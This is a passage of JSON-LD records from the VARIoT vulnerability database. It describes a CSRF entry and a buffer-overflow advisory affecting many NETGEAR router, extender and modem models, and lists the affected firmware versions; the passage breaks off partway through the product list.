"id": "CNVD-2021-50917"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014939"
},
{
"date": "2020-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1983"
},
{
"date": "2020-04-23T16:15:12.570000",
"db": "NVD",
"id": "CVE-2017-18742"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-50917"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014939"
},
{
"date": "2020-04-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1983"
},
{
"date": "2024-11-21T03:20:48.703000",
"db": "NVD",
"id": "CVE-2017-18742"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1983"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Cross-site request forgery vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014939"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1983"
}
],
"trust": 0.6
}
}
var-202004-1643
Vulnerability from variot
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.38, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGN2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.20, R6300v2 before 1.0.4.22, R6400 before 1.0.1.32, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R6900P before 1.3.0.18, R7000 before 1.0.9.28, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.52, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.46. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR WNR3500L, etc. are all products of NETGEAR. WNR3500L is a wireless router. NETGEAR D6220 is a wireless modem. WN2500RP is a wireless network signal extender. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow. This affects D6220 prior to 1.0.0.38, D6400 prior to 1.0.0.74, D7000v2 prior to 1.0.0.74, D8500 prior to 1.0.3.39, DGN2200v4 prior to 1.0.0.102, DGN2200Bv4 prior to 1.0.0.102, EX3700 prior to 1.0.0.70, EX3800 prior to 1.0.0.70, EX6000 prior to 1.0.0.30, EX6100 prior to 1.0.2.22, EX6120 prior to 1.0.0.40, EX6130 prior to 1.0.0.22, EX6150 prior to 1.0.0.38, EX6200 prior to 1.0.3.86, EX7000 prior to 1.0.0.64, R6250 prior to 1.0.4.20, R6300v2 prior to 1.0.4.22, R6400 prior to 1.0.1.32, R6400v2 prior to 1.0.2.52, R6700 prior to 1.0.1.44, R6900 prior to 1.0.1.44, R6900P prior to 1.3.0.18, R7000 prior to 1.0.9.28, R7000P prior to 1.3.0.18, R7300DST prior to 1.0.0.62, R7900 prior to 1.0.2.10, R7900P prior to 1.3.0.10, R8000 prior to 1.0.4.12, R8000P prior to 1.3.0.10, R8300 prior to 1.0.2.116, R8500 prior to 1.0.2.116, WN2500RPv2 prior to 1.0.1.52, WNDR3400v3 prior to 1.0.1.18, and WNR3500Lv2 prior to 1.2.0.46
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1643",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.28"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.10"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.86"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.18"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.18"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.20"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.116"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.46"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.22"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.46"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "dgn2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.102"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.22"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.26"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.53"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.27"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.28"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.29"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.35"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.55"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.82"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.70"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.76"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.16 1.1.130"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.18"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.20"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.16"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.34 1.0.70"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.56"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.62"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.64"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.72"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.74"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.82 1.1.117"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.84"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.6 10.1.12"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.14"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.16"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.06"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.6"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8 10.0.77"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.30"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.34"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.46"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.28"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.22"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.7.2 1.1.93"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.4"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.10"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.12"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.14"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.18"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.26"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.22"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.8"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
